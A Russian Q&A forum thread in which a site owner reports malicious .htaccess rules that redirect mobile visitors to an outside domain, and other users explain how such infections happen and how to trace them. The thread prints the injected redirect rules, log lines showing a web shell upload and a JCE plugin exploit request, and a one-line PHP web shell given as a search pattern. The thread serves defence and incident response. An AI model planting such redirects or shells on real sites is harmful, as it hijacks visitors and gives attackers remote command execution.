Каким образом малвари попадают на сайт?

Добрый день,
подскажите, каким образом на сайт может попасть малварь?
Предыстория — пришло письмо от яндекса, что мой сайт, возможно, взломан. После беглого анализа нашет в .htacceess вот такую дрянь:
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|iemobile|nokia|ucweb|ucbrowser) [NC] RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC] RewriteRule (.*) http://id.nice-dns.ru/?18&source=oda.ua [L,R=302] # on
Авторизация у меня идет по ключам, порт ssh — не стандартный. Чужих скриптов практически нет (каюсь, есть сапа, но как я понимаю, если бы это была она, то пол рунета бы уже визжала). Где-то с пару месяцев назад была похожая ситуация, но тогда аторизация к ssh была по логину/паролю и сессия была записана в winscp. Я предположил, что у меня просто свиснули пароль и сделали зловред, но похоже ноги растут откуда-то с другого места.
Может есть какие-нибудь сканеры уязвимостей по адекватным деньгам? Или это какая-то изветсная дырка? Потому как под новый год, ведел такое же у polyana.ua/, к которым имею отношения только как клиент.
  • Вопрос задан
  • 5539 просмотров
Решения вопроса 1
sledopit
@sledopit
Как правило такая фигня распространяется двумя способами:
А. дыра в сайте. ищется путём усердного чтения логов и поиска шеллов.
совсем недавно я помогал товаришу с похожей штукой (на ресурсе воткнулись iframe'ы). порядок действий был примерно такой:
  1. сравнение с бэкапом и выявление изменнённых / новых файлов
  2. изучение новых файлов, естественно, один из них оказался шеллом ( .cache_rcnzyz.php )
    (если нет бэкапов, то ССЗБ стоит поискать на стандартные функции шеллов (в случае с php это всякие shell_exec и base64 [стоит учитывать, что свой код так же может их использовать, поэтому искать нужно внимательно])
  3. изучение логов на предмет доступа и заливки данного шелла. у меня были примерно такие строки:
    xxx.xxx.xxx.xx - - [09/Jan/2013:18:09:46 +0400] "POST /images/stories/.cache_rcnzyz.php HTTP/1.0" 200 501 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

    к сожалению злоумышленник оказался достаточно осторожным и с этого ip (который к тому же оказался и зарубежным, т.е. доблестной полиции не пожалуешься) других обращений не было. нужная дыра была найдена по времени создания файла (+- пара минут).
    zzz.zzz.zzz.zz - - [08/Jan/2013:00:02:21 +0400] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.0" 200 668 "-" "BOT/0.1 (BOT for JCE)"
ура, дырка найдена, заплатка сделана, злоумышленник забанен.

В. человек с ftp доступом к ресурсу подхватил троян (про ssh слышал лишь один раз). ну тут менять пароли и фиксить заражённую машину.
Ответ написан
Пригласить эксперта
Ответы на вопрос 4
POS_troi
@POS_troi
СадоМазо Админ, флудер, троль.
Так вы-же не указали изначально что VDS ;)

Всё-же поищите шелы в php (или на чём у вас там) скриптах, что-то типо
<?php system($_GET["cmd"]); ?>
но скорее всего всё будет завёрнуто в base64, как правило сразу обосновываются. Проверить можно просто сравнением всех файлов с эталоном, у меня на нескольких серверах ежедневно прогоняется сравнение MD5 сумм.
Ответ написан
POS_troi
@POS_troi
СадоМазо Админ, флудер, троль.
Не обязательно взломали ваш аккаунт, взломан мог был и весь сервер — получили административный аккаунт.
В идеале смотреть логи сервера и искать каким образом был изменён файл.

Заодно по всем файлам поискать внедренный shell.
Ответ написан
charliez
@charliez
Движок сайта не вордпресс случайно?
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через TM ID
Похожие вопросы